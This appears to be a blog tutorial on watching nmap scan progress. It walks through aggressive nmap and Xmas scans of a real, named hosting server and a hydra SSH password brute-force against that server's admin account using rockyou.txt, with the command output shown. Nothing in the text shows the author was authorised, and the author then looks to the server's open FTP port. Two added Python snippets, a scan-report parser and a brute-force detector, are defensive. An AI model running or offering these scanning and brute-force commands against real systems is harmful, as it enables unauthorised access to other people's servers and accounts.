The nmap -A -P0 command line will scan a host and get information about the host and what is running on it (-A enables OS detection, version detection, script scanning and traceroute; -P0 is the older spelling of -Pn, which skips host discovery and treats the host as up). Press j whilst the scan is running to print statistics about the progress of the scan. Press it again to update them.
┌─[root@parrot]─[/home/user]
└──╼ #nmap -A -P0 202.146.215.17
Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-19 23:48 UTC
Stats: 0:01:56 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 34.67% done; ETC: 23:54 (0:03:37 remaining)
This is very useful when a scan is taking a very long time to perform and you need feedback on how much longer it has to run.
We are getting there slowly.
┌─[root@parrot]─[/home/user]
└──╼ #nmap -A -P0 202.146.215.17
Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-19 23:48 UTC
Stats: 0:01:56 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 34.67% done; ETC: 23:54 (0:03:37 remaining)
Stats: 0:05:26 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 43.46% done; ETC: 00:01 (0:07:04 remaining)
Stats: 0:07:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 47.70% done; ETC: 00:03 (0:07:43 remaining)
Stats: 0:07:40 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 49.39% done; ETC: 00:04 (0:07:50 remaining)
Stats: 0:11:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 58.17% done; ETC: 00:07 (0:07:57 remaining)
Stats: 0:11:11 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 58.49% done; ETC: 00:08 (0:07:56 remaining)
And we are done with our scan. This server has open SSH, FTP and HTTP ports…
Nmap scan report for nix17.qnetau.com (202.146.215.17)
Host is up (0.048s latency).
Not shown: 941 filtered ports, 55 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      ProFTPD
| ssl-cert: Subject: commonName=*.qnetau.com
| Subject Alternative Name: DNS:*.qnetau.com, DNS:qnetau.com
| Not valid before: 2013-02-11T00:00:00
|_Not valid after:  2018-02-10T23:59:59
80/tcp   open  http     Apache httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache
|_http-title: Quadra Hosting Server
443/tcp  open  ssl/http Apache httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache
|_http-title: Quadra Hosting Server
| ssl-cert: Subject: commonName=*.qnetau.com
| Subject Alternative Name: DNS:*.qnetau.com, DNS:qnetau.com
| Not valid before: 2013-02-11T00:00:00
|_Not valid after:  2018-02-10T23:59:59
|_ssl-date: TLS randomness does not represent time
8022/tcp open  ssh      OpenSSH 5.3 (protocol 2.0)
Aggressive OS guesses: Linux 3.0 (96%), ProVision-ISR security DVR (95%), Linux 2.6.32 (95%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (93%), OpenWrt White Russian 0.9 (Linux 2.4.30) (93%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (93%), HP P2000 G3 NAS device (93%), Linux 2.6.32 - 3.10 (93%), HIKVISION DS-7600 Linux Embedded NVR (Linux 2.6.10) (93%), DD-WRT v24-sp2 (Linux 3.10) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 6 hops

TRACEROUTE (using port 49163/tcp)
HOP RTT      ADDRESS
1   4.70 ms  dsldevice.lan (10.1.1.1)
2   45.69 ms masceqx-lns14.syd.nsw.m2core.net.au (122.148.3.99)
3   44.06 ms 241.02.static.syd.iprimus.net.au (203.134.3.241)
4   52.04 ms 24469.syd.equinix.com (45.127.172.29)
5   50.86 ms ar1.syd1.quadrahosting.com.au (202.146.208.1)
6   41.73 ms nix17.qnetau.com (202.146.215.17)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1862.27 seconds
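A report like the one above is easiest to act on once it is structured. As an added example (not code from the original post), this Python snippet parses Nmap's normal-output format: it turns the PORT/STATE/SERVICE/VERSION table into records, attaches the ssl-cert expiry printed under a port, and flags certificates that are expired or close to expiry relative to the scan start time. The sample report is constructed with documentation addresses, not the page's real host.

```python
import re
from datetime import datetime, timedelta
# Constructed sample in Nmap's normal-output format (documentation addresses, not the page's host).
SAMPLE_REPORT = """\
Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-19 23:48 UTC
Nmap scan report for host.example.test (192.0.2.10)
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      ProFTPD
| ssl-cert: Subject: commonName=*.example.test
| Not valid before: 2013-02-11T00:00:00
|_Not valid after:  2018-02-10T23:59:59
80/tcp   open  http     Apache httpd
8022/tcp open  ssh      OpenSSH 5.3 (protocol 2.0)
"""

START_RE = re.compile(r"^Starting Nmap .* at (\d{4}-\d\d-\d\d \d\d:\d\d)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
NOT_AFTER_RE = re.compile(r"^\|_?Not valid after:\s*(\S+)")

def parse_report(text):
    """Return (scan_start, ports): one dict per PORT line, with any ssl-cert expiry attached."""
    scan_start, ports = None, []
    for line in text.splitlines():
        m = START_RE.match(line)
        if m:
            scan_start = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M")
            continue
        m = PORT_RE.match(line)
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2),
                          "state": m.group(3), "service": m.group(4),
                          "version": m.group(5).strip(), "cert_not_after": None})
            continue
        m = NOT_AFTER_RE.match(line)
        if m and ports:  # NSE script lines ("| ...") belong to the preceding port
            ports[-1]["cert_not_after"] = datetime.fromisoformat(m.group(1))
    return scan_start, ports

def cert_findings(scan_start, ports, warn_days=90):
    """List (port, finding) for certs already expired or expiring within warn_days of the scan."""
    findings = []
    for p in ports:
        exp = p["cert_not_after"]
        if exp is None:
            continue
        if exp < scan_start:
            findings.append((p["port"], "expired"))
        elif exp - scan_start < timedelta(days=warn_days):
            findings.append((p["port"], "expires soon"))
    return findings
```

Feed it the contents of a report saved with -oN; the same parser works for the -sX output further down because the table format is identical.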
Now I can scan the SSH port on the remote server. Use the -s parameter to specify the SSH port if it is not port 22.
Using this command line: hydra -l admin -s 8022 -P rockyou.txt 202.146.215.17 -t 4 ssh.
┌─[✗]─[root@parrot]─[/home/user]
└──╼ #hydra -l admin -s 8022 -P rockyou.txt 202.146.215.17 -t 4 ssh
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-07-20 00:30:41
[DATA] max 4 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~56032 tries per task
[DATA] attacking service ssh on port 8022
[STATUS] 17.00 tries/min, 17 tries in 00:01h, 14344385 to do in 14063:08h, 4 active
[STATUS] 13.67 tries/min, 41 tries in 00:03h, 14344385 to do in 17493:10h, 4 active
[STATUS] 12.71 tries/min, 89 tries in 00:07h, 14344385 to do in 18803:31h, 4 active
[STATUS] 12.27 tries/min, 184 tries in 00:15h, 14344344 to do in 19489:36h, 4 active
I had a lot of problems with this approach as the server has some protection against SSH brute force, but there is also an open FTP port.
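The protection the author ran into is typically a rate-based block on repeated failed logins, and the [STATUS] lines above (a dozen tries per minute from four parallel tasks) are exactly the pattern such a block keys on. As an added example (not from the original post), this Python snippet shows the detection side: a sliding-window count of failed sshd passwords per source address over constructed syslog-style log lines, raising an alert when the threshold is crossed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd log lines in syslog format (documentation addresses, not the page's server).
SAMPLE_LOG = """\
Jul 20 00:30:41 host sshd[2101]: Failed password for invalid user admin from 198.51.100.7 port 51422 ssh2
Jul 20 00:30:45 host sshd[2103]: Failed password for invalid user admin from 198.51.100.7 port 51430 ssh2
Jul 20 00:30:49 host sshd[2105]: Failed password for invalid user admin from 198.51.100.7 port 51438 ssh2
Jul 20 00:30:52 host sshd[2107]: Failed password for invalid user admin from 198.51.100.7 port 51441 ssh2
Jul 20 00:30:55 host sshd[2109]: Failed password for invalid user admin from 198.51.100.7 port 51449 ssh2
Jul 20 00:31:02 host sshd[2111]: Accepted publickey for ops from 203.0.113.9 port 40210 ssh2
Jul 20 00:45:10 host sshd[2150]: Failed password for ops from 203.0.113.9 port 40222 ssh2
"""

FAILED_RE = re.compile(
    r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(\S+) from (\S+) port \d+")

def detect_bruteforce(log_text, threshold=5, window_s=60, year=2017):
    """Return {source_ip: time_of_first_alert} for sources with >= threshold failures within window_s seconds."""
    recent = defaultdict(deque)   # source ip -> timestamps of failures still inside the window
    alerts = {}
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue  # accepted logins and unrelated messages are not counted
        # syslog timestamps carry no year, so the caller supplies it
        ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        src = m.group(3)
        q = recent[src]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:  # slide the window forward
            q.popleft()
        if len(q) >= threshold and src not in alerts:
            alerts[src] = ts
    return alerts

if __name__ == "__main__":
    for ip, when in detect_bruteforce(SAMPLE_LOG).items():
        print(f"alert: {ip} crossed the failed-login threshold at {when:%H:%M:%S}")
```

The single failure from 203.0.113.9 never trips the threshold, which is the behaviour you want so that one mistyped password does not lock out an administrator.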
But now I am trying to get more information about the server. Using this command line: nmap -A -P0 -sX 202.146.215.17.
root@ip-172-31-20-16:~# nmap -A -P0 -sX 202.146.215.17
Starting Nmap 6.40 ( http://nmap.org ) at 2017-07-20 01:40 UTC
And as before, I can press j to get feedback about the progress of the scan.
root@ip-172-31-20-16:~# nmap -A -P0 -sX 202.146.215.17
Starting Nmap 6.40 ( http://nmap.org ) at 2017-07-20 01:40 UTC
Stats: 0:03:41 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 6.70% done; ETC: 01:49 (0:04:39 remaining)
Stats: 0:04:23 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 24.50% done; ETC: 01:48 (0:03:11 remaining)
Now I get the verbose output of the Nmap scan of the target host. Note that the Xmas scan lists almost every port as open|filtered: a port that does not answer the FIN/PSH/URG probe may be either open or filtered and -sX cannot tell the two apart, so the three ports reported as open were resolved by the version detection that -A turns on, and the lack of a confirmed closed port is also why the OS detection warns that its results may be unreliable.
Nmap scan report for nix17.qnetau.com (202.146.215.17)
Host is up (0.0029s latency).
Not shown: 997 open|filtered ports
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Quadra Hosting Server
443/tcp  open  ssl/http Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Quadra Hosting Server
| ssl-cert: Subject: commonName=*.qnetau.com
| Not valid before: 2013-02-11T00:00:00+00:00
|_Not valid after:  2018-02-10T23:59:59+00:00
|_ssl-date: 1985-01-15T10:30:54+00:00; -32y185d15h22m13s from local time.
8022/tcp open  ssh      OpenSSH 5.3 (protocol 2.0)
|_ssh-hostkey: 1024 ec:50:36:e5:e4:11:49:42:d5:fb:b9:0a:b6:e9:1f:13 (DSA)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (94%), Linux 2.6.18 - 2.6.22 (93%), Linux 3.2.0 (88%), OpenWrt Kamikaze 8.09 (Linux 2.6.25.20) (88%), Tomato 1.27 - 1.28 (Linux 2.4.20) (88%), IPCop 1.9.19 or IPFire firewall 2.9 (Linux 2.6.32) (87%), Netgear DG834G WAP or Western Digital WD TV media player (87%), Linux 3.2.1 (87%), Linux 3.2 (86%), OpenWrt White Russian 0.9 (Linux 2.4.30) (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 7 hops

TRACEROUTE (using proto 1/icmp)
HOP RTT      ADDRESS
1   1.06 ms  ec2-XX-XX-0-20.ap-southeast-2.compute.amazonaws.com (XX.XXX.0.20)
2   2.38 ms  XX.XXX.XXX.XXX
3   20.56 ms XX.XX.XX.XX
4   2.32 ms  XX.XX.XX.XX
5   2.46 ms  24469.syd.equinix.com (45.127.172.29)
6   3.27 ms  ar1.syd1.quadrahosting.com.au (202.146.208.1)
7   2.97 ms  nix17.qnetau.com (202.146.215.17)

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2223.22 seconds
These Nmap tips should help out any budding penetration tester; they are a good way to get information about the progress of a scan that is taking a very long time to complete.